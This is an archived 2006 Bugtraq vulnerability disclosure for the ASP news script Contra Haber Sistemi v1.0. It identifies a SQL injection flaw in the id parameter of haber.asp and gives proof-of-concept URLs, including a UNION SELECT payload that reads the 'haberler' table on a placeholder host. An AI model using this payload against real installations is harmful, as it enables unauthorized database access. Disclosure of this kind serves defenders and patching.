Bugtraq mailing list archives

Contra Haber Sistemi v1.0 SqL Injection Vuln.


From: ShaFuq31 () HoTMaiL CoM
Date: 16 Dec 2006 15:50:27 -0000

# LiderHack.Org & BhhGroup.Org

# script name : Contra Haber Sistemi v1.0

# Script Download : http://www.maxiasp.com/scriptler/Haber_Sistemi.rar

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | CyBorG | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | B1G B0SS | 
UNiKnoX |

# Vulnerable file : haber.asp

#Vulnerable :

Vulnerable -----> http://victim.com/[path to script]/haber.asp?id=[SqL]
Vulnerable ----->http://victim.com/[path to 
script]/haber.asp?id=-1%20union%20select%20*%20from%20haberler%20where%20id=82

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]


Current thread: